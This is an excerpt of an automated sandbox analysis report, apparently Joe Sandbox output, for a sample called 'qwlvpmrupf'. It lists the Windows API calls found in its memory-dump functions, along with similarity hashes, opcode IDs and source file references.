                                                • API ID: Window$Show$Enable$MessageSend
                                                • String ID:
                                                • API String ID: 642888154-0
                                                • Opcode ID: 890b24ccfd1d195d5347e41e57a4cd549068160922738ee5828ad3f128418d20
                                                • Instruction ID: 78d407a58d020cb44b421231c0ff584c9576a6e6b6f3888dc1e3a20363d4f38d
                                                • Opcode Fuzzy Hash: 890b24ccfd1d195d5347e41e57a4cd549068160922738ee5828ad3f128418d20
                                                • Instruction Fuzzy Hash: 6F416374605244AFDB15CF24CA89FA67BF0BB4A304F18417EF5886B3E2CB75A845CB58
                                                APIs
                                                • GetForegroundWindow.USER32(?,?,00000000), ref: 003F2C45
                                                  • Part of subcall function 003EEE49: GetWindowRect.USER32(?,?), ref: 003EEE61
                                                • GetDesktopWindow.USER32 ref: 003F2C6F
                                                • GetWindowRect.USER32(00000000), ref: 003F2C76
                                                • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 003F2CB2
                                                • GetCursorPos.USER32(?), ref: 003F2CDE
                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 003F2D3C
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                • String ID:
                                                • API String ID: 2387181109-0
                                                • Opcode ID: 6ba6e3df160770884a26d5eb4e0b28f6ec8fb22245a719ed8347c1153cef62db
                                                • Instruction ID: 91796ae1ee0a03f785350de2a91fc8dcf53fe915d30ded7177d1f8457039ecd7
                                                • Opcode Fuzzy Hash: 6ba6e3df160770884a26d5eb4e0b28f6ec8fb22245a719ed8347c1153cef62db
                                                • Instruction Fuzzy Hash: 9031F072905319ABD721DF54D944BAFB7A9FFC4314F000A2AF995A7280CB31E908CB92
                                                APIs
                                                  • Part of subcall function 0037557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00375558,?,?,003B4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0037559E
                                                • _wcslen.LIBCMT ref: 003E61D5
                                                • CoInitialize.OLE32(00000000), ref: 003E62EF
                                                • CoCreateInstance.OLE32(00410CC4,00000000,00000001,00410B34,?), ref: 003E6308
                                                • CoUninitialize.OLE32 ref: 003E6326
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                • String ID: .lnk
                                                • API String ID: 3172280962-24824748
                                                • Opcode ID: 67dc02376183bacd516602e285286979e55a7c47405ab0d82923c238ec9c28c6
                                                • Instruction ID: fbd217f7d2c264f55c823046f2921746003c675c6930b35874e810f11167bea7
                                                • Opcode Fuzzy Hash: 67dc02376183bacd516602e285286979e55a7c47405ab0d82923c238ec9c28c6
                                                • Instruction Fuzzy Hash: 8FD174716042209FC715EF26C485A2ABBF1FF99354F11895DF88A9B3A1CB31EC45CB92
                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 003D210F
                                                • UnloadUserProfile.USERENV(?,?), ref: 003D211B
                                                • CloseHandle.KERNEL32(?), ref: 003D2124
                                                • CloseHandle.KERNEL32(?), ref: 003D212C
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 003D2135
                                                • HeapFree.KERNEL32(00000000), ref: 003D213C
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                • String ID:
                                                • API String ID: 146765662-0
                                                • Opcode ID: a31e7d55871d54b97637fda4d6b1175f856829bfc83a60c193cc3979ed543c6c
                                                • Instruction ID: 7c99a95aed06e9300b9d6ec19d08f10044890a60936634e945ffef8e4c867743
                                                • Opcode Fuzzy Hash: a31e7d55871d54b97637fda4d6b1175f856829bfc83a60c193cc3979ed543c6c
                                                • Instruction Fuzzy Hash: 1DE0E576804101BBDB012FF1EE0CD0ABF39FF49322B108230F225A6070CB329424DB98
                                                APIs
                                                  • Part of subcall function 00374154: _wcslen.LIBCMT ref: 00374159
                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003DCEAE
                                                • _wcslen.LIBCMT ref: 003DCEF5
                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003DCF5C
                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 003DCF8A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info_wcslen$Default
                                                • String ID: 0
                                                • API String ID: 1227352736-4108050209
                                                • Opcode ID: 80d49ae59667c5658fcade78f9bceeda57c810d46a293dcbd2d64bbe14bb3df9
                                                • Instruction ID: 8fb99729e914ca6c8ae58b4e6829fb8f8f4272879d43157f05c257065f3931b5
                                                • Opcode Fuzzy Hash: 80d49ae59667c5658fcade78f9bceeda57c810d46a293dcbd2d64bbe14bb3df9
                                                • Instruction Fuzzy Hash: 0D5104B26343029FD7169F28E844BABB7EDAF85310F051A2EF895D6390DB70C904C752
                                                APIs
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00404794
                                                • IsMenu.USER32(?), ref: 004047A9
                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004047F1
                                                • DrawMenuBar.USER32 ref: 00404804
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Menu$Item$DrawInfoInsert
                                                • String ID: 0
                                                • API String ID: 3076010158-4108050209
                                                • Opcode ID: b2e26cfcadab810ecaa5539f930b552b798797575beab309e919276033f9b94b
                                                • Instruction ID: 8a8759c9d2ddad781b1afa55d142ce996d1954650458d6a844061d51a00adf9f
                                                • Opcode Fuzzy Hash: b2e26cfcadab810ecaa5539f930b552b798797575beab309e919276033f9b94b
                                                • Instruction Fuzzy Hash: 22415CB9A00249EFDB20DF50D984AABB7B4FF85314F04852AFA05A7390C734ED54CB64
                                                APIs
                                                  • Part of subcall function 0037B25F: _wcslen.LIBCMT ref: 0037B269
                                                  • Part of subcall function 003D4536: GetClassNameW.USER32(?,?,000000FF), ref: 003D4559
                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 003D26F6
                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 003D2709
                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 003D2739
                                                  • Part of subcall function 003784B7: _wcslen.LIBCMT ref: 003784CA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessageSend$_wcslen$ClassName
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 2081771294-1403004172
                                                • Opcode ID: 534bc5580329733f82f250a7de319f66318e50886a4b290bc8d2f10d0b3f13c5
                                                • Instruction ID: 08247393bd66db5e2f5c22ea07a2ae8246a04bc773f0e8dcded2664e5d767e2c
                                                • Opcode Fuzzy Hash: 534bc5580329733f82f250a7de319f66318e50886a4b290bc8d2f10d0b3f13c5
                                                • Instruction Fuzzy Hash: 98210772900104BFDB26ABB4EC45DFFB779EF55750F14811AF421AB2E2DB7C490A9A10
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0037637F,?,?,003760AA,?,00000001,?,?,00000000), ref: 0037633E
                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00376350
                                                • FreeLibrary.KERNEL32(00000000,?,?,0037637F,?,?,003760AA,?,00000001,?,?,00000000), ref: 00376362
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Library$AddressFreeLoadProc
                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                • API String ID: 145871493-3689287502
                                                • Opcode ID: 1bfe7bb6337ab0528d4ca936895386ae14654cb255507c8eedc71368ec8486b5
                                                • Instruction ID: 880c55003774ef8bc5b38689e99bcf70a97a6b7ac01736007c8388b661ae810f
                                                • Opcode Fuzzy Hash: 1bfe7bb6337ab0528d4ca936895386ae14654cb255507c8eedc71368ec8486b5
                                                • Instruction Fuzzy Hash: 52E08636E01F2157E22317596C19B5AA6189F86B227064125F904F6158DF7CCC05C0B8
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,003B54C3,?,?,003760AA,?,00000001,?,?,00000000), ref: 00376304
                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00376316
                                                • FreeLibrary.KERNEL32(00000000,?,?,003B54C3,?,?,003760AA,?,00000001,?,?,00000000), ref: 00376329
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Library$AddressFreeLoadProc
                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                • API String ID: 145871493-1355242751
                                                • Opcode ID: 9bdd3dd501e0ea7c83fbe66e524239fdce486bf56578b1ba11fea7c7a7eb4532
                                                • Instruction ID: e28b0e3e96e0d4fea7fb1003324643ed5e1f4ffa232d9e6924f1a7174c21de3a
                                                • Opcode Fuzzy Hash: 9bdd3dd501e0ea7c83fbe66e524239fdce486bf56578b1ba11fea7c7a7eb4532
                                                • Instruction Fuzzy Hash: 58D0C23AE029216BA2332764AC29A8E7E14DECAB1134A4035B805B613CCF3CCC05C1D8
                                                APIs
                                                • GetCurrentProcessId.KERNEL32 ref: 003FAD86
                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003FAD94
                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 003FADC7
                                                • CloseHandle.KERNEL32(?), ref: 003FAF9C
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Process$CloseCountersCurrentHandleOpen
                                                • String ID:
                                                • API String ID: 3488606520-0
                                                • Opcode ID: 399947c4f0ca9fff2ca066e2bfd5c31f4563ffd1727f64fe530ef5bcf4da1b1f
                                                • Instruction ID: 0bbb52b50124fa5723fcb7b69a76d4686b65c6181e8440960a9663969ebabb1c
                                                • Opcode Fuzzy Hash: 399947c4f0ca9fff2ca066e2bfd5c31f4563ffd1727f64fe530ef5bcf4da1b1f
                                                • Instruction Fuzzy Hash: B4A1BFB16047009FD721EF28C896F2AB7E5AF48714F14885DF6999F292DB74EC41CB82
                                                APIs
                                                  • Part of subcall function 0037B25F: _wcslen.LIBCMT ref: 0037B269
                                                  • Part of subcall function 003FD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003FC00D,?,?), ref: 003FD314
                                                  • Part of subcall function 003FD2F7: _wcslen.LIBCMT ref: 003FD350
                                                  • Part of subcall function 003FD2F7: _wcslen.LIBCMT ref: 003FD3C7
                                                  • Part of subcall function 003FD2F7: _wcslen.LIBCMT ref: 003FD3FD
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003FC404
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003FC45F
                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003FC4C2
                                                • RegCloseKey.ADVAPI32(?,?), ref: 003FC505
                                                • RegCloseKey.ADVAPI32(00000000), ref: 003FC512
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                • String ID:
                                                • API String ID: 826366716-0
                                                • Opcode ID: 651f3cc7b3bf6b2d0907758a46fe884ebb4c0a455a39d8a8a75770e073edfa44
                                                • Instruction ID: 0d208b81b36ae076dc9b7536b0bcfdcb3a380a64fd337f4628b348816c9246af
                                                • Opcode Fuzzy Hash: 651f3cc7b3bf6b2d0907758a46fe884ebb4c0a455a39d8a8a75770e073edfa44
                                                • Instruction Fuzzy Hash: 6861CF31218249AFD316DF24C990E7ABBE5FF84308F14949CF5998B2A2CB35ED05CB91
                                                APIs
                                                  • Part of subcall function 003DE60C: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003DD6E2,?), ref: 003DE629
                                                  • Part of subcall function 003DE60C: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003DD6E2,?), ref: 003DE642
                                                  • Part of subcall function 003DE9C5: GetFileAttributesW.KERNELBASE(?,003DD755), ref: 003DE9C6
                                                • lstrcmpiW.KERNEL32(?,?), ref: 003DEC9F
                                                • MoveFileW.KERNEL32(?,?), ref: 003DECD8
                                                • _wcslen.LIBCMT ref: 003DEE17
                                                • _wcslen.LIBCMT ref: 003DEE2F
                                                • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 003DEE7C
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                • String ID:
                                                • API String ID: 3183298772-0
                                                • Opcode ID: be2d1fe5535ffc2a2522ce1585d47e6c0bb74a5b164530af46f39f60a6abce93
                                                • Instruction ID: a0b8f933c9354871ebb1ceec5514c7843cde517f4fbff5279ffe97094a0a866b
                                                • Opcode Fuzzy Hash: be2d1fe5535ffc2a2522ce1585d47e6c0bb74a5b164530af46f39f60a6abce93
                                                • Instruction Fuzzy Hash: 325184B24083855BC736EB94D881ADFB7ECAF85310F00492FF5899B152EF34A6888756
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: 4d589b8f4a4a4d3928701d99e4de8e2da385b6bdd643a420e74e7106a1995690
                                                • Instruction ID: 30cfb060903c7ed5175b14d6633b48936c83eaff1edad3f115417b4e85bb2b75
                                                • Opcode Fuzzy Hash: 4d589b8f4a4a4d3928701d99e4de8e2da385b6bdd643a420e74e7106a1995690
                                                • Instruction Fuzzy Hash: 9241D136A002049FDB25DF7CC881A5EB7F6EF8A714F1641A8E915EF291D631ED01CB80
                                                APIs
                                                • GetInputState.USER32 ref: 003E4225
                                                • TranslateAcceleratorW.USER32(?,00000000,?), ref: 003E427C
                                                • TranslateMessage.USER32(?), ref: 003E42A5
                                                • DispatchMessageW.USER32(?), ref: 003E42AF
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003E42C0
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                • String ID:
                                                • API String ID: 2256411358-0
                                                • Opcode ID: 63dd2979c27b90404f4ca19285aa489dc1a1059513798ccc774e5c3df522a6cf
                                                • Instruction ID: 32834389d58a4b3f4788851e5823b04d6c9ac871bc0359a221571d30e955ae2f
                                                • Opcode Fuzzy Hash: 63dd2979c27b90404f4ca19285aa489dc1a1059513798ccc774e5c3df522a6cf
                                                • Instruction Fuzzy Hash: BF31E6749002959EEB36CB76DD08BB637ACAB0D305F450B7DF962820E0E7B49984CB15
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 003D21A5
                                                • PostMessageW.USER32(00000001,00000201,00000001), ref: 003D2251
                                                • Sleep.KERNEL32(00000000,?,?,?), ref: 003D2259
                                                • PostMessageW.USER32(00000001,00000202,00000000), ref: 003D226A
                                                • Sleep.KERNEL32(00000000,?,?,?,?), ref: 003D2272
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessagePostSleep$RectWindow
                                                • String ID:
                                                • API String ID: 3382505437-0
                                                • Opcode ID: c5adea2e261892acb998c7c727f8f1ca14b62f414cc634121cd136ff963b96e4
                                                • Instruction ID: 22ebed374d03409c8130886b529f653cb87f57c3946583434d8326f744286b66
                                                • Opcode Fuzzy Hash: c5adea2e261892acb998c7c727f8f1ca14b62f414cc634121cd136ff963b96e4
                                                • Instruction Fuzzy Hash: 4731D672900219EFDB04CFA8DD89ADF7BB5EB24315F104626F925AB2D0C770AD54CB90
                                                APIs
                                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 004060A4
                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 004060FC
                                                • _wcslen.LIBCMT ref: 0040610E
                                                • _wcslen.LIBCMT ref: 00406119
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00406175
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessageSend$_wcslen
                                                • String ID:
                                                • API String ID: 763830540-0
                                                • Opcode ID: dcdaf65e6f9c924131f84c1cd79ca6a87fc48ae992b49bfa8e3c7d1d778c0ec1
                                                • Instruction ID: 6b06eeb5f3120ece6c2e780ff88e4a03573e9ec4245ef0ae8b92bd33752916ad
                                                • Opcode Fuzzy Hash: dcdaf65e6f9c924131f84c1cd79ca6a87fc48ae992b49bfa8e3c7d1d778c0ec1
                                                • Instruction Fuzzy Hash: CD215071900218ABDB119FA4CC849EE7BB9EF05324F108267F926BA2C5D7788585CF55
                                                APIs
                                                • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,003D07D1,80070057,?,?,?,003D0BEE), ref: 003D08BB
                                                • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003D07D1,80070057,?,?), ref: 003D08D6
                                                • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003D07D1,80070057,?,?), ref: 003D08E4
                                                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003D07D1,80070057,?), ref: 003D08F4
                                                • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003D07D1,80070057,?,?), ref: 003D0900
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                • String ID:
                                                • API String ID: 3897988419-0
                                                • Opcode ID: 169463ac901039cdb332ddddc02d78524edf039d3ff3d8aa70022f9a51e9a6c6
                                                • Instruction ID: 38d648af53fcc882cf42a48b714a5c8dcbf8a2629038e9769f36b93222015ef1
                                                • Opcode Fuzzy Hash: 169463ac901039cdb332ddddc02d78524edf039d3ff3d8aa70022f9a51e9a6c6
